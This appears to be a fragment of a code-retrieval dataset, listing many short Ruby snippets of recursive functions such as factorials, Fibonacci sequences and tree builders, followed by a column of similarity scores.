"def factorials_rec(num)\n return [1] if num == 1\n return [] if num == 0\n prev_seq = factorials_rec(num-1)\n prev_seq << factorials(num)\n prev_seq\n\nend",
"def factorial_recursive(num)\n if num == 0\n 1\n else \n num * factorial_recursive(num-1)\n \n # 7 * 6 = 42\n # 42 * 5 = 210\n # 210 * 4 = 840\n # 840 * 3 = 2520\n # 2520 *2 = 5040\n # 5040* 1 = 5040\n end\nend",
"def factorial_recursive(n)\n\tif n == 0\n\t\treturn 1 # 0! = 1\n\telse\n\t\treturn n*factorial_recursive(n-1) #keep calling the function\n\tend\nend",
"def factorials_rec(num)\n return [1] if num <= 1\n\n result = factorials_rec(num-1)\n result << (num-1) * result[-1]\n\nend",
"def rec_factorial(n)\n if n==0\n return 1\n end\n return rec_factorial(n-1)*n\nend",
"def factorial_recursive(n)\n return 1 if n == 0\n n * factorial_recursive(n-1)\nend",
"def factorial_recursive(n)\n n.zero? ? 1 : n * factorial_recursive(n - 1)\nend",
"def nested(s)\n # this is a wrapper method\n return nested_2(s, 0, (s.length - 1) )\nend",
"def sum_recurse(num)\n return 0 if num == 0\n num[0] + sum_recurse(num.delete(1))\nend",
"def factorial_recursive(n)\n if n == 1\n return 1\n end\n return n * factorial_recursive(n-1)\nend",
"def recursion(number)\n if number == 1\n return number\n else\n p number\n recursion(number - 1)\n end\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n factorial = factorials_rec(num - 1)\n factorial << (num - 1) * factorial[-1]\n end\nend",
"def factorial_recursive n\n return 1 if n == 0\n n * factorial_recursive(n-1)\nend",
"def fibonacci(depth)\n\ti=0\n\tstart = \"\"\n\twhile i<depth and i<2\n\t\tstart=start+\"1 \"\n\t\ti+=1\n\tend\n\treturn start+fibonacciRecurse(1,1,depth-2)\nend",
"def make_pattern(array = [], number) # Define a method with two paremeter one array which will be the output and another one which is the given number.\r\n if number <= 0 # This is our base case it will stop if the number is 0 or less than that.\r\n array << number #Then we will push the number in to the array.\r\n\t\tarray << array.reverse #Now we will push the array in to it self, But in reverse order.\r\n\t\tarray.flatten! # At this two point we have a nested array it should be turn to one array.\r\n array.delete_at(array.length / 2) # Now there is a problem in our array the middle element of the array is repeated twice.So we delete one.\r\n return array # The array is ready to be called.\r\n end\r\n array << number # It pushes the number in to array \r\n make_pattern(array , number - 5) # This will make our method recursive.It will deduct 5 from our number at each time the method execute.\r\nend",
"def factorial_recursive(n)\n if n == 0\n 1\n else\n n * factorial_recursive(n-1)\n end\nend",
"def factorial_recursive(n)\n if n == 0\n 1\n else\n n * factorial_recursive(n-1)\n end\nend",
"def build_tree( n , d )\n \n if d.key?('v')\n n < d['v'] ? build_tree(n , d['l']) : build_tree(n, d['r'])\n else\n d['l'] = {}\n d['v'] = n\n d['r'] = {}\n end\n \nend",
"def factorials_rec(num)\n #6 == [0!, 1!, 2!, 3!, 4!, 5!]\n return [1] if num == 1\n\n factorials_rec(num-1) + [(num-1) * factorials_rec(num-1).last]\nend",
"def perm_recur(ans=\"\",s)\n if s.length == 0\n return\n end\n\n if s.length == 1\n puts ans + s\n return\n end\n \n if s.length == 2\n puts ans + s[0] + s[1] \n puts ans + s[1] + s[0]\n return\n end\n\n (0..s.size-1).each do |l|\n new = s.chars.rotate(l).join('')\n element = new[0] \n rest = new[1..new.size-1]\n perm_recur(ans + element, rest)\n end\nend",
"def recursive_factorial(n)\n return 1 if n < 1\n\n n * recursive_factorial(n - 1)\nend",
"def factorials_rec(num)\n return [1] if num==1\n return [1,1] if num==2\n factorials_rec(num-1) + [(num-1) * factorials_rec(num-1).last]\nend",
"def factorials_rec(num)\n return [1] if num == 1\n\n factorials_rec(num-1) << factorials_rec(num-1).last * (num - 1)\nend",
"def generate_parenthesis_recursive(open, closed)\n if closed < open || closed < 0 || open < 0\n return []\n end\n\n if open == 1 && closed == 0\n return [\"(\"]\n elsif open == 0 && closed == 1\n return [\")\"]\n end\n\n combinations = []\n combinations += generate_parenthesis_recursive(open - 1, closed).map {|a| \"(#{a}\"}\n combinations += generate_parenthesis_recursive(open, closed - 1).map {|a| \")#{a}\"}\n\n combinations\nend",
"def factorial_recursive(n)\n\tif (n==0)\n\t\treturn 1\n\telse\n\t\t\treturn n*factorial_recursive(n-1)\n\tend\nend",
"def sum_recur(array)\n#for array = []\n return 0 if array == []\n\n first_el = array.shift\n recursive_call = sum_recur(array)\n first_el + recursive_call\n\nend",
"def factorial_recursive(n)\n if n < 0\n \"Invalid input\"\n elsif n == 0\n 1\n else\n n *= factorial_recursive(n-1)\n end\nend",
"def factorials_rec(num)\n return [1] if num == 1\n prev = factorials_rec(num - 1)\n prev << prev[-1] * (num - 1)\n prev\nend",
"def esxlRecurse i, j\n esxlStraightRecurse(i, j) + esxlDiagonalRecurse(i, j)\nend",
"def recursive_fac(num)\n return num if num == 1\n tail_rec(num - 1) * num\nend",
"def iterate_function(start_value, function)\n Node.new(start_value, lambda{ iterate_function( function.call(start_value), function ) })\nend",
"def factorial_recursive(n)\n\t\tif n == 1\n\t\t\treturn 1\n\t\telse\n\t\t\tn * factorial_recursive(n-1)\n\t\tend\n\tend",
"def recursion(n)\n if n % 2 ==0\n n\n else\n recursion(n + 1)\nend\nend",
"def factorial_recursive(num = 0)\n # this is a guard clause\n return \"Can not calculate factorial of a negative number\" if num < 0\n\n if num <= 1\n 1 # this is our base case\n else\n num * factorial_recursive(num - 1) # this is where the recursion happens\n end\nend",
"def factorials_rec(num)\n return [1] if num == 1\n\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n\n\nend",
"def factorials_rec(num)\n return [1] if num <= 1\n res = factorials_rec(num-1)\n res.concat([(num-1)*res[-1]])\nend",
"def sum_recursively(num)\n return num if num == 0\n sum_recursively(num-1) + num\nend",
"def rec_build(level, direction, rotation, fractal_list)\r\n # At the lowest level, add an actual piece to the array\r\n if (level == 0)\r\n fractal_list.push((direction + rotation) % 360)\r\n return\r\n end\r\n \r\n # At higher levels, we need to define the shape of the fractal\r\n for piece_direction in @base_fractal\r\n rec_build(\r\n level - 1, # Drill down to the next level\r\n piece_direction, # Take direction from the base array\r\n (direction + rotation) % 360, # Rotate lower-level according to higher level structure\r\n fractal_list) # Append to the list\r\n end\r\n end",
"def compile_helper(multiD, path, oneD)\n # Check if the helper function has called for the first time.\n if not path.eql?(\"\")\n path = path + \"/\"\n end\n\n multiD.each do |key, value|\n\n # If the value is a nother container, recursively call the helper function and pass the value, \n # the current path as well as the current key and finally the associative array.\n if value.kind_of?(Hash)\n oneD = compile_helper(value, path + key.to_s, oneD)\n\n # If the value is an array, create a new path for each element. Use index as the path.\n elsif value.kind_of?(Array) then\n i = 0\n value.each do |element|\n oneD.store(path + key.to_s + \"/\" + i.to_s, element)\n i += 1\n end\n # Else, store the path as the key and the number as the value.\n else \n oneD.store(path + key.to_s, value)\n end\n\n end\n\n return oneD\nend",
"def factorial_rec(num)\n return [1] if num == 1\n res = factorial_rec(num - 1)\n res << (num - 1) * res[-1]\nend",
"def factorials_rec(num)\n if num == 1\n return [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def rec_r(depth, arr)\n return arr if depth == 0\n\n rec_r(depth-1, arr.map do |v|\n ['a', 'b', 'c'].map do |chr|\n v + chr\n end\n end.flatten)\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n recs = factorials_rec(num - 1)\n recs << (num - 1) * recs.last\n end\nend",
"def recurse_call(*args)\n # # create a state for the call.\n # call_state = SequencerT.current.step\n\n # Get the variables for handling the stack overflow.\n stack_ptr = @stack_ptr\n depth = @depth \n argsIdx = @argsIdx\n this = self\n\n # Adds the argument to the stack if no overflow.\n HDLRuby::High.top_user.hif(stack_ptr < depth) do\n # hprint(\"stack_ptr=\",stack_ptr,\" depth=\",depth,\"\\n\")\n # Adds the arguments and the return state to the current stack frame.\n # Since not pushed the stack yet for not loosing the previous\n # arguments, add +1 to the offset when poking the new arguments.\n # args.each_with_index { |arg,i| self.poke(@argsIdx + i,arg,1) }\n args.each_with_index { |arg,i| this.poke(argsIdx + i,arg,1) }\n end\n\n # Push a new frame.\n self.push_all\n\n # create a state for the call.\n call_state = SequencerT.current.step\n\n # Prepare the handling of overflow\n call_state_value = call_state.value\n overflow = @funcE.overflow\n if overflow then\n HDLRuby::High.top_user.hif(stack_ptr > depth) do\n HDLRuby::High.top_user.instance_exec(&overflow)\n end\n end\n\n # Get the state value of the function: it is the state\n # following the first function call.\n func_state_value = @state.value + 1\n # Do the call.\n call_state.gotos << proc do\n HDLRuby::High.top_user.instance_exec do\n hif(stack_ptr <= depth) do\n next_state_sig <= func_state_value\n end\n helse do\n # Overflow! Skip the call.\n next_state_sig <= call_state_value + 1\n # if overflow then\n # # There is some overflow code to execute.\n # HDLRuby::High.top_user.instance_exec(&overflow)\n # end\n end\n end\n end\n\n return call_state\n end",
"def produce_tree(ary); end",
"def solution(t)\n # write your code in Ruby 2.2\n depth = 0\n childs = []\n\n childs << t.l if t.l\n childs << t.r if t.r\n\n while not childs.empty? do\n depth += 1\n\n cc = []\n childs.each do |t|\n cc << t.l if t.l\n cc << t.r if t.r\n end\n\n childs = cc\n end\n\n depth\nend",
"def factorials_rec(num)\n return [1] if num == 1\n fact = factorials_rec(num-1)\n fact << fact.length * fact[-1]\nend",
"def factorials_rec(num)\n return [1] if num == 0\n return [1] if num == 1\n \n prev = factorials_rec(num-1)\n prev << (num-1) * prev[-1]\nend",
"def rec_sum(num)\n return num if num <= 1\n num + rec_sum(num - 1)\nend",
"def factorials_rec(num)\n return [1] if num <= 1\n fact = factorials_rec(num-1)\n fact << (num-1) * fact.last\nend",
"def bitonic_recurse(arr, low, count, direction)\n return if count <= 1\n\n mid = count / 2\n bitonic_recurse(arr, low, mid, 1)\n bitonic_recurse(arr, low + mid, mid, -1)\n bitonic_merge(arr, low, count, direction)\n arr\nend",
"def factorials_rec(num)\n return [1] if num == 1\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\nend",
"def rec_fib(n)\r\n return [0] if n == 0\r\n return [0,1] if n ==1\r\n return [0,1,1] if n ==2\r\n \r\n rec_fib(n-1) << (rec_fib(n-1)[-1] + rec_fib(n-2)[-1]) \r\n\r\nend",
"def my_controlled_flatten(n=1)\n #here\n return self if n < 1\n\n results = []\n self.each do |el|\n if el.class == Array\n #here\n results += el.my_controlled_flatten(n-1)\n else\n results << el\n end\n end\n\n results\n\n end",
"def factorials_rec(num)\n return [1] if num == 1\n facs = factorials_rec(num - 1)\n facs << facs[-1] * (num - 1)\nend",
"def factorials_rec(num)\n if num == 1\n [num]\n else\n factorials = factorials_rec(num - 1)\n factorials << factorials.last * (num - 1)\n factorials\n end\nend",
"def sum_recursive(num)\n # can also compute sum with symbol (1..5).inject(:+)\n (1..num).inject { |sum, n| sum + n }\nend",
"def funcion\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 57 )\n\n\n return_value = FuncionReturnValue.new\n\n # $rule.start = the first token seen before matching\n return_value.start = @input.look\n\n\n root_0 = nil\n\n __K_DEF303__ = nil\n __K_FUNC304__ = nil\n __Identificador305__ = nil\n __LPAR306__ = nil\n __RPAR308__ = nil\n __LLAIZQ309__ = nil\n __LLADER311__ = nil\n parametros_tipos307 = nil\n bodyexp310 = nil\n\n\n tree_for_K_DEF303 = nil\n tree_for_K_FUNC304 = nil\n tree_for_Identificador305 = nil\n tree_for_LPAR306 = nil\n tree_for_RPAR308 = nil\n tree_for_LLAIZQ309 = nil\n tree_for_LLADER311 = nil\n\n begin\n root_0 = @adaptor.create_flat_list\n\n\n # at line 259:4: K_DEF K_FUNC Identificador LPAR ( parametros_tipos )? RPAR LLAIZQ bodyexp LLADER\n __K_DEF303__ = match( K_DEF, TOKENS_FOLLOWING_K_DEF_IN_funcion_1280 )\n if @state.backtracking == 0\n tree_for_K_DEF303 = @adaptor.create_with_payload( __K_DEF303__ )\n @adaptor.add_child( root_0, tree_for_K_DEF303 )\n\n end\n\n __K_FUNC304__ = match( K_FUNC, TOKENS_FOLLOWING_K_FUNC_IN_funcion_1282 )\n if @state.backtracking == 0\n tree_for_K_FUNC304 = @adaptor.create_with_payload( __K_FUNC304__ )\n @adaptor.add_child( root_0, tree_for_K_FUNC304 )\n\n end\n\n __Identificador305__ = match( Identificador, TOKENS_FOLLOWING_Identificador_IN_funcion_1284 )\n if @state.backtracking == 0\n tree_for_Identificador305 = @adaptor.create_with_payload( __Identificador305__ )\n @adaptor.add_child( root_0, tree_for_Identificador305 )\n\n end\n\n __LPAR306__ = match( LPAR, TOKENS_FOLLOWING_LPAR_IN_funcion_1286 )\n if @state.backtracking == 0\n tree_for_LPAR306 = @adaptor.create_with_payload( __LPAR306__ )\n @adaptor.add_child( root_0, tree_for_LPAR306 )\n\n end\n\n # at line 259:36: ( parametros_tipos )?\n alt_42 = 2\n look_42_0 = @input.peek( 1 )\n\n if ( look_42_0 == TIPO )\n alt_42 = 1\n end\n case alt_42\n when 1\n # at line 259:36: parametros_tipos\n @state.following.push( TOKENS_FOLLOWING_parametros_tipos_IN_funcion_1288 )\n parametros_tipos307 = parametros_tipos\n @state.following.pop\n if @state.backtracking == 0\n @adaptor.add_child( root_0, parametros_tipos307.tree )\n end\n\n\n end\n __RPAR308__ = match( RPAR, TOKENS_FOLLOWING_RPAR_IN_funcion_1291 )\n if @state.backtracking == 0\n tree_for_RPAR308 = @adaptor.create_with_payload( __RPAR308__ )\n @adaptor.add_child( root_0, tree_for_RPAR308 )\n\n end\n\n __LLAIZQ309__ = match( LLAIZQ, TOKENS_FOLLOWING_LLAIZQ_IN_funcion_1293 )\n if @state.backtracking == 0\n tree_for_LLAIZQ309 = @adaptor.create_with_payload( __LLAIZQ309__ )\n @adaptor.add_child( root_0, tree_for_LLAIZQ309 )\n\n end\n\n @state.following.push( TOKENS_FOLLOWING_bodyexp_IN_funcion_1295 )\n bodyexp310 = bodyexp\n @state.following.pop\n if @state.backtracking == 0\n @adaptor.add_child( root_0, bodyexp310.tree )\n end\n\n __LLADER311__ = match( LLADER, TOKENS_FOLLOWING_LLADER_IN_funcion_1297 )\n if @state.backtracking == 0\n tree_for_LLADER311 = @adaptor.create_with_payload( __LLADER311__ )\n @adaptor.add_child( root_0, tree_for_LLADER311 )\n\n end\n\n\n # - - - - - - - rule clean up - - - - - - - -\n return_value.stop = @input.look( -1 )\n\n\n if @state.backtracking == 0\n return_value.tree = @adaptor.rule_post_processing( root_0 )\n @adaptor.set_token_boundaries( return_value.tree, return_value.start, return_value.stop )\n\n end\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n return_value.tree = @adaptor.create_error_node( @input, return_value.start, 
@input.look(-1), re )\n\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 57 )\n\n\n end\n\n return return_value\n end",
"def fiboRec(no)\n if no == 0\n return [0]\n elsif no == 1\n return fiboRec(0).push(1)\n else\n arr = fiboRec(no-1)\n return arr.push(arr[no-1] + arr[no-2])\n end\nend",
"def recursive_tower_of_hanoi(start,extra,end)\r\n\r\n #code here\r\nend",
"def fn(s)\n\t# Not only that, but since I heard you liked functions, I put a\n\t# function IN YOUR FUNCTION.\n\t#\n\t# And not only that, THAT function is a recursive function\n\t# We'll call it sub, cause we're original.\n\t#\n\t# It takes more parameters:\n\t# s : the string we're parsing\n\t# i : an index to remember how many steps we did already\n\t# floor : the floor we're in at the moment\n\tdef sub(s, i, floor)\n\t\treturn i if floor < 0\n\n\t\t# A recursive function is a function which calls itself\n\t\t# here, we call ourself with different parameters:\n\t\t# s[1, s.length-1] : We remove the first character from the string\n\t\t# i+1 : We increase the number of steps we did already\n\t\t# floor + (s[0] == '(' ? 1 : -1 ) : We add 1 or subtract 1 depending on\n\t\t# wether the first character from the string is '(' or ')'\n\t\tsub(s[1, s.length-1], i+1, floor + (s[0] == '(' ? 1 : -1 ))\n\tend\n\n\t# Here is the first call to the recursive sub function:\n\t# We start with the full string, on the 0th step, on floor 0\n\tsub(s, 0, 0)\nend",
"def tail_rec_factorial(n)\n return tail_rec_factorial_(n, 1)\nend",
"def nested(s)\n # return nested_helper(s[1..-1])\n paren_end = s.index(')')\n return !s.include?('(') if paren_end.nil? \n\n paren_start = s[0...paren_end].rindex('(')\n\n return false if paren_start.nil?\n\n return nested(s[1..paren_start]+s[paren_end+1..-1])\n\nend",
"def factorials_rec(num)\n return [1] if num == 1\n prev = factorials_rec(num - 1)\n prev << (num - 1) * prev[-1]\nend",
"def depth=(_arg0); end",
"def recursive_function(solutions, s)\n # puts \"BEGINNING RECURSIVE FUNCTION\" #NICE TO HAVE\n # print_board s[:moves] #NICE TO HAVE\n if not validate_state(s)\n return false\n end\n if check_solved(s)\n s[:solved] = true\n # puts \"A solution has been found.\" #NICE TO HAVE\n # print_state_data(s) #NICE TO HAVE\n solutions.push(deep_copy_solution(s[:moves]))\n return true\n end\n derive_moves_metadata(s)\n poss_moves = get_poss_next_moves(s)\n # This given thing actually doesn't work yet.\n # I need to make sure that the given thing only gets triggered when the two\n # moves that this one is based on are ALSO given.\n # Iow, given moves can only come from pre-existing given moves.\n # TODO: Get the below portion of code figured out.\n # Read the above TODO comment about this for more information and\n # possible alternative approaches to optimizing around given moves.\n #\n # if poss_moves.length == 1\n # s[:given_moves].push(s[:m]) # THIS LINE NEEDS TO BE TESTED !!!***\n # puts \"Move \" + s[:m].to_s + \" has been discovered to be given.\"\n # print_state_data(s)\n # end\n while not poss_moves.empty?\n # puts \"poss_moves: \" + poss_moves.to_s #NICE TO HAVE\n s[:prospective_move] = poss_moves.shift()\n s[:prospective_move][:r] = s[:regions][s[:prospective_move][:y]][s[:prospective_move][:x]]\n apply_move(s)\n recursive_function(solutions, s)\n undo_move(s)\n # print_board s[:moves] #NICE TO HAVE\n end\n return s\nend",
"def factorials_rec(num)\n return [] if num == 0\n return [1] if num == 1\n prev = factorials_rec(num - 1)\n prev + [prev.last * (num - 1)]\nend",
"def expansion(n)\n \"1 + 1/#{nesting(n)}\"\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def factorials_rec(num)\n return 1 if num == 0 \n return [1] if num == 1\n fact = [1]\n\n fact << [(fact[-1] * factorials_rec(num-1))]\n# (2) \n# 4 * fact_rc(3) 2\n# 3 * fact_rc(2) 6\n# 2 * fact_rc(1) 2\n# 1 * fact(rc 0 )\nend",
"def factorials_rec(num)\n return [1] if num == 1\n\n facs = factorials_rec(num - 1)\n facs << facs.last * num\n\n facs\nend",
"def dfs_rec(target,current,array_length,stack,visited)\n left = current.find_left_child[0]\n right = current.find_right_child[0]\n parent = current.find_parent[0]\n if current.value == target\n return current\n elsif visited.length == array_length\n return nil\n elsif !left.nil? && !visited.include?(left)\n stack.push(left)\n visited.push(left)\n dfs_rec(target,left,array_length,stack,visited)\n elsif !right.nil? && !visited.include?(right)\n stack.push(right)\n visited.push(right)\n dfs_rec(target,right,array_length,stack,visited)\n else\n stack.pop\n dfs_rec(target,parent,array_length,stack,visited)\n end\nend",
"def build_default_proc(_left, _right, _total, _path, _last_height)\n ->(h, level) do\n left, right, total, path, last_height = _left, _right, _total, _path, _last_height\n levels = level - last_height\n if path == 1\n increase = left * levels\n path = 0\n total += increase\n right += increase\n else\n increase = right * levels\n path = 1\n total += increase\n left += increase\n end\n last_height = level\n nested = {\n left: left,\n right: right,\n total: total,\n path: path,\n next: nested\n }\n nested.default_proc = build_default_proc(left, right, total, path, last_height)\n\n\n h[level] = nested\n end\nend",
"def factorials_rec(num)\n return [1] if num == 1\n factorials_rec(num-1) + [(1...num).to_a.reduce(:*)]\nend",
"def factorials_rec(num)\n return [1] if num == 1\n facs = factorials_rec(num - 1)\n facs << facs.last * num\nend",
"def build_tree_rec(preorder, inorder)\n if inorder.length != 0\n original = preorder.shift\n ind = inorder.index(original)\n root = TreeNode.new(inorder[ind])\n root.left = build_tree(preorder, inorder[0...ind])\n root.right = build_tree(preorder, inorder[ind + 1..-1])\n root\n end\nend",
"def recursive_terms(n)\n all_ns << n\n # if we get 1111\n # we have 1111 and should then get 211 and then 31 and then 4\n # then continue from 1111 to 121 then 13\n # then continue from 1111 to 112\n # to find these terms, find the \n next_ns = convert_n_to_next_terms(n)\n next_ns.each do |next_n|\n all_ns << recursive_terms(next_n)\n end\n return all_ns.flatten.uniq\nend",
"def factorials_rec(num)\n answer = []\n return [1] if num == 1\n return [1, 1] if num == 2\n next_num = (num - 1) * factorials_rec(num - 1)[-1]\n answer << next_num\n #answer\nend",
"def factorials_rec(num)\n return [1] if num == 0\n num.times do |num|\n facs = factorials_rec(num-1)\n facs << num * facs.last\n facs\n end\nend",
"def factorials_rec(num)\n return [1,1] if num == 2\n return [1] if num == 1\n\n factorial_array = factorials_rec(num-1)\n factorials = factorial_array + [(num-1) * factorial_array.last]\n factorials\nend",
"def fibonacci2(num)\n a = 0; b = 1\n array = [a,b]\n def inner(a,b,num,array)\n c = a + b\n array += [c]\n if c < num\n array = inner(b,c,num,array)\n end\n return array\n end\n array = inner(a,b,num,array)\n return array\nend",
"def sum_recur(array)\n return 0 if array.length <= 0\n array[0] + sum_recur(array[1..-1])\nend",
"def fib_rec(n)\n return nil if n < 1\n return [1] if n == 1\n return [1, 1] if n == 2\n current = [1, 1]\n recursive = fib_rec(n - 1)\n (recursive.length - 1).times do |el|\n current << recursive[el] + recursive[el + 1]\n end\n current\nend",
"def rec_sum(n)\n if n == 0\n return 0\n else\n return n + rec_sum(n-1)\n end\nend",
"def depth_first(value)\n\tend",
"def generate_parenthesis2(n)\n result = []\n build_parenthesis2(n, result, \"\", 0, 0)\n return result\nend",
"def build_tree(unit, node, level = 0)\r\n return nil if level > @max_depth\r\n \t\r\n unit.next_move(node.current_case).each do |next_case|\r\n next if next_case[0] < 0 || next_case[0] > 7 ||\r\n next_case[1] < 0 || next_case[1] > 7 \r\n \r\n next_node = Node.new(next_case, node)\r\n node.children << next_node\r\n\r\n build_tree(unit, next_node, level + 1)\r\n end \r\n end",
"def fun1 n\n return 0 if n == 1\n return 1 + fun1(n/2)\nend",
"def nesting() end"
] |
[
"0.72534883",
"0.67001754",
"0.6450046",
"0.61399716",
"0.61399716",
"0.59712577",
"0.590705",
"0.5799627",
"0.5787223",
"0.57655096",
"0.57536495",
"0.57430583",
"0.5730778",
"0.5701788",
"0.56930506",
"0.5684765",
"0.5684686",
"0.5677164",
"0.567698",
"0.5671565",
"0.56598455",
"0.56535304",
"0.5652787",
"0.564206",
"0.5638272",
"0.5636645",
"0.5636645",
"0.5627894",
"0.5618619",
"0.56093454",
"0.5603566",
"0.55973285",
"0.5589179",
"0.5588186",
"0.55784076",
"0.5563311",
"0.5525478",
"0.5524059",
"0.552134",
"0.55085504",
"0.5505917",
"0.55052173",
"0.5492141",
"0.5488372",
"0.5478307",
"0.5475567",
"0.54742366",
"0.54594374",
"0.5445712",
"0.5441155",
"0.54400885",
"0.54388094",
"0.54373366",
"0.54297084",
"0.5428705",
"0.5426157",
"0.5409656",
"0.54086465",
"0.5402102",
"0.5400446",
"0.5394886",
"0.53777665",
"0.537266",
"0.5365891",
"0.5361768",
"0.5360814",
"0.534758",
"0.5346475",
"0.5339975",
"0.53371716",
"0.53354454",
"0.53340554",
"0.533159",
"0.53295594",
"0.53283644",
"0.5322253",
"0.5319839",
"0.5319528",
"0.5318399",
"0.5318399",
"0.5318399",
"0.53161085",
"0.5312131",
"0.53119206",
"0.5309884",
"0.53067243",
"0.53012127",
"0.5300306",
"0.53001904",
"0.53000796",
"0.52962613",
"0.52949303",
"0.52909017",
"0.5272853",
"0.5258898",
"0.5257171",
"0.5255685",
"0.52436376",
"0.5237797",
"0.52292514",
"0.52285874"
] |
0.0
|
-1
|
this gives me the willies, but whatever. fix later.
|
def create
  #User.transaction do
  email = params[:email]
  logger.debug(email)
  generated_password = Devise.friendly_token.first(8)
  begin
    user = User.create!(:email => email, :password => generated_password)
    # Mail the newly created user (passing `self`, the controller, here was a bug).
    UserMailer.send_welcome_email(user).deliver
    flash[:notice] = "Invitation sent."
  rescue ActiveRecord::RecordInvalid => e
    # Rescue the specific validation failure instead of swallowing every exception.
    flash[:error] = "Could not create user: #{e.message}"
  end
  render 'results'
  #end
end
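
A hedged sketch of the transactional shape the commented-out lines above suggest. Devise is assumed to be available, and UserMailer.send_welcome_email plus the 'results' template are app-specific names carried over from the snippet, not confirmed API.

def create
  email = params[:email]
  generated_password = Devise.friendly_token.first(8)
  # Roll the user row back if anything inside the block raises.
  User.transaction do
    user = User.create!(:email => email, :password => generated_password)
    UserMailer.send_welcome_email(user).deliver
  end
  flash[:notice] = "Invitation sent."
  render 'results'
rescue ActiveRecord::RecordInvalid => e
  # Only validation failures are rescued; anything else should surface.
  flash[:error] = "Could not create user: #{e.message}"
  render 'results'
end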
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def malts; end",
"def superweening_adorningly(counterstand_pyrenomycetales)\n end",
"def offences_by; end",
"def king_richard_iii; end",
"def low_toms\n [43]\n end",
"def buzzword; end",
"def buzzword; end",
"def romeo_and_juliet; end",
"def anchored; end",
"def hiddens; end",
"def stderrs; end",
"def terpene; end",
"def take_bath\n self.hygiene += 4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n @hygiene\n end",
"def berlioz; end",
"def rubbishness(name)\n name.each_char.map { |x|\n case x\n when /[A-Z]/\n 1\n when '?', '=', '!'\n -2\n else\n 0\n end\n }.inject(&:+) + (name.size / 100.0)\n end",
"def probers; end",
"def take_bath\n self.hygiene += 4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n end",
"def take_bath\n self.hygiene += 4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n end",
"def ninety_nine_bottles_of_beer\nend",
"def ninety_nine_bottles_of_beer\nend",
"def ninety_nine_bottles_of_beer\nend",
"def throw_fierce_lqqks\n 'Here I am, giving you Soviet-Satellite realness'\n end",
"def kids_musical; end",
"def existing_words\n draw_current = draw\n p \"The 7 letters drawn are:\"\n p draw_current\n p \"-\"*70\n\n combinations = combine(draw_current).flat_map{ |w| w.permutation.to_a}.uniq.map { |e| e.join }\n combinations.map{|i| search(i, UPPER_BOUND_INI, LOWER_BOUND_INI, NO_ITERATION_INI)}.flatten.reject{|x| x==nil}\nend",
"def gen_washing\r\r\n end",
"def boatswain\n return self.swabbie unless self.swabbie.nil?\n highval = 0\n self.axe.each do |flotsam|\n counter = self.filibuster(flotsam)\n highval = ((highval <=> counter) == 1) ? highval : counter\n end\n \".#{highval + 1}\"\n end",
"def caveats; nil end",
"def caveats; nil end",
"def jack_handey; end",
"def sharp; accidental; end",
"def in_law; end",
"def blg; end",
"def weber; end",
"def silly_adjective; end",
"def cutoffs\n end",
"def ignores; end",
"def wtfpyra (a)\n\t\tfullpyra (a)\n\t\treversefullpyra (a)\n\tend",
"def whisper_words(words)\nreturn words.map{ |elem| elem.downcase + \"...\"}\nend",
"def tongue_twister; end",
"def broken_bikes\n bikes.select {|bike| bike.broken?}\n end",
"def cracklepop1\n def aux x\n /[A-Z]+/i.match(x.to_s).to_s\n end\n (1..100).map do |i|\n x = i%3==0 ? 'crackle' : i\n i%5==0 ? (aux(x)+'pop') : x\n end\nend",
"def nonstriker_perimartium(pronunciation_crotched)\n end",
"def solve_zero_vs_six_vs_nine\n return if @arr[1].nil? || @arr[4].nil?\n\n #p \"1,4: #{@arr[1]},#{@arr[4]}\"\n\n @words.filter{|x| x.length == 6 && @hash[x].nil?}.each{|w|\n if @arr[4].chars.all?{|c| w.chars.include?(c)}\n solved(9, w)\n elsif @arr[1].chars.all?{|c2| w.chars.include?(c2)}\n solved(0, w)\n else\n solved(6, w)\n end\n }\n end",
"def strip_excess_words(content_player_id)\n\t\tself.played_words.each do |value|\n\t\t\tif value.t != self.t - 1 \n\t\t\t\tvalue.t_l.clear \n\t\t\tend\n\t\tend\t\n\tend",
"def schubert; end",
"def leeway; end",
"def leeway; end",
"def celebration; end",
"def jeweler; end",
"def jeweler; end",
"def jeweler; end",
"def weasley(values)\nweasley = values.map do |entry|\n last_names_only = entry[1].split.last\n if last_names_only == \"Weasley\"\n first_names = entry[1].split.first\n last_names = entry[1].split.last\n puts \"#{first_names.to_s} Badger #{last_names.to_s.chomp}\"\n end\nend\nend",
"def mis_ramos\n\n\tend",
"def who_we_are\r\n end",
"def gounod; end",
"def whisper_words(words)\r\n return words.map { |ele| ele.downcase + \"...\" }\r\nend",
"def wig\n 'I have regular wig.'\n end",
"def mambo_no_5; end",
"def look\n [\"Friends\", \"Dating\", \"A relationship\", \"Networking\", \"Fun\"][self.looking_for - 1]\n end",
"def bellini; end",
"def whisper_words(words)\n\nend",
"def schumann; end",
